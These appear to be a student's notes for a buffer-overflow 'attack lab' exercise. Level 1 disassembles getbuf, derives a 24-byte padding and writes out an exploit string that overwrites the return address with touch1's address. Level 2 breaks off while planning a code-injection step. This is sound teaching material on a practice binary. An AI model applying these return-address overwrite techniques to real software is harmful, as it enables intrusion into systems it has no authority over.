------------
| Level 1: |
------------
- address of touch 1 is 0x401dc8
- need to find how much to pad that to change return address
- "Dump of assembler code for function getbuf:
=> 0x0000000000401dae <+0>:     endbr64
   0x0000000000401db2 <+4>:     sub    $0x18,%rsp
   0x0000000000401db6 <+8>:     mov    %rsp,%rdi
   0x0000000000401db9 <+11>:    call   0x402077 <Gets>
   0x0000000000401dbe <+16>:    mov    $0x1,%eax
   0x0000000000401dc3 <+21>:    add    $0x18,%rsp
   0x0000000000401dc7 <+25>:    ret"
- based on this the stack pointer is offsetted 0x18 hex, which is 24 decimal
	so we need an offset of 24 0's for our input string.
- remember that must be in little endian
 so exploit string must be formatted from 0x401dc8 to "c8 1d 40"
##############################################################################
/* Padding of 24 bytes */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
/* address of touch 1 */
c8 1d 40 00 00 00 00 00
#############################################################################
-------------
| Level 2:  |
-------------
- move cookie into parameter register (rdi) and then call touch 2
- touch2 address = 0x401e08
- cookie address = 0x32046301 
- need to enter touch2
